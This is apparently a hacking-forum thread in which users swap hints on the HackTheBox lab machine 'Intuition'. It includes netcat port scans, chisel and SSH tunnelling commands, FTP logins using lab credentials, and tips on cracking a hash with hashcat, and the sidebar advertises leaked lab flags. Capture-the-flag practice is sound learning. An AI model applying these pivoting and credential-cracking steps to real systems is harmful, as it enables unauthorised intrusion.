HTB- Intuition
by trevor69000 - Saturday April 27, 2024 at 06:46 PM
(04-28-2024, 10:18 PM)maggi Wrote:
(04-28-2024, 10:07 PM)osamy7593 Wrote: guys i found selenuim grid on local 4444

we have now creds adam:adam gray

bootleg port scan  shows ftp is running on 172.21.0.1


dev_acc@intuition:~$ nc -zv 172.21.0.1 1-65535 2>&1 | grep -v refused
Connection to 172.21.0.1 21 port [tcp/ftp] succeeded!
Connection to 172.21.0.1 22 port [tcp/ssh] succeeded!
Connection to 172.21.0.1 80 port [tcp/http] succeeded

I had selenium up for a while and don't know what to do there sooo hopefully that proves more  interesting?

selenuuim is running on 4444 127.0.0.1 .. i used chisel for port farwarding i get a web page
 but i'm stuck ... on kali --> ./chisel server  7777 --reverse | on ssh --> ./chisel client 10.10.x.x:7777 R:4444:127.0.0.1:4444
Ban reason:
Asking for rep is not allowed (Permanent)
Reply
(04-28-2024, 10:31 PM)andlommy Wrote: Anyone figured what to do with lopez user, how to get the auth_key for the json file? can't seem to brute force the md5 hash in the runner2 file

how do u become lopez ? any hint

(04-28-2024, 10:31 PM)andlommy Wrote: Anyone figured what to do with lopez user, how to get the auth_key for the json file? can't seem to brute force the md5 hash in the runner2 file

check run_tests.sh you will get a pattern
can u provide the way to become lopez
Reply
(04-28-2024, 10:32 PM)osamy7593 Wrote:
(04-28-2024, 10:18 PM)maggi Wrote:
(04-28-2024, 10:07 PM)osamy7593 Wrote: guys i found selenuim grid on local 4444

we have now creds adam:adam gray

bootleg port scan  shows ftp is running on 172.21.0.1


dev_acc@intuition:~$ nc -zv 172.21.0.1 1-65535 2>&1 | grep -v refused
Connection to 172.21.0.1 21 port [tcp/ftp] succeeded!
Connection to 172.21.0.1 22 port [tcp/ssh] succeeded!
Connection to 172.21.0.1 80 port [tcp/http] succeeded

I had selenium up for a while and don't know what to do there sooo hopefully that proves more  interesting?

selenuuim is running on 4444 127.0.0.1 .. i used chisel for port farwarding i get a web page
 but i'm stuck ... on kali --> ./chisel server  7777 --reverse | on ssh --> ./chisel client 10.10.x.x:7777 R:4444:127.0.0.1:4444

I used ssh instead of chisel because I had a key, 
I am stuck on dev_acct and am looking around in runner.c so gears are starting to click but the engine isn't quite turning over
Reply
vnc Wink

ssh -L localhost:7900:172.21.0.4:7900 dev_acc@10.10.11.15 -i ~/.ssh/id_rsa_devacc -N

i wanna break out dev_acc : ) suggest hints ?
Reply
(04-28-2024, 10:46 PM)andlommy Wrote: check logs all of them

where do you find run_tests.sh?

ftp adam:adam grey@127.0.0.1
cd backup
cd runner1
get runner1
get runner1.c
ger runner_tests.sh
bye

cat runner_tests.sh
u will find the part of test key and you just need to mask the remain part and crack it with hashcat

please give me a hint how to break dev_acc : )
Reply
guys this is the auth key : UHI75GHINKOP but now what to do
Ban reason:
Asking for rep is not allowed (Permanent)
Reply
(04-28-2024, 05:36 PM)MakeFilez Wrote: For everyone asking about how to get the files from FTP:
              ftp://ftp_admin:u3jai8y71s2@ftp.local/
Then just put the file you want after the /
              ftp://ftp_admin:u3jai8y71s2@ftp.local/{private_key}

but how do you enumerate the files? through the pdf page it's impossible afaik
Reply
(04-28-2024, 10:43 PM)asdfplayer Wrote: vnc Wink

ssh -L localhost:7900:172.21.0.4:7900 dev_acc@10.10.11.15 -i ~/.ssh/id_rsa_devacc  -N

i wanna break out dev_acc : ) suggest hints ?

ohhh thats looks like a hit of gold dust if I can find the pass
Reply
This machine is insane, anyone got root? Im stuck with runner2
Reply
(04-28-2024, 11:08 PM)maggi Wrote:
(04-28-2024, 10:43 PM)asdfplayer Wrote: vnc Wink

ssh -L localhost:7900:172.21.0.4:7900 dev_acc@10.10.11.15 -i ~/.ssh/id_rsa_devacc  -N

i wanna break out dev_acc : ) suggest hints ?

ohhh thats looks like a hit of gold dust if I can find the pass

bro we can use chisel for port forward
Ban reason:
Asking for rep is not allowed (Permanent)
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 360 88,710 03-28-2026, 09:28 AM
Last Post: catsweet
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 23 2,348 03-28-2026, 03:30 AM
Last Post: lulaladrow
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 7,490 03-27-2026, 07:22 PM
Last Post: stn
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 350 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - ALL Challenges you Stuck in osamy7593 2 646 03-27-2026, 04:24 PM
Last Post: catsweet



 Users browsing this thread: 1 Guest(s)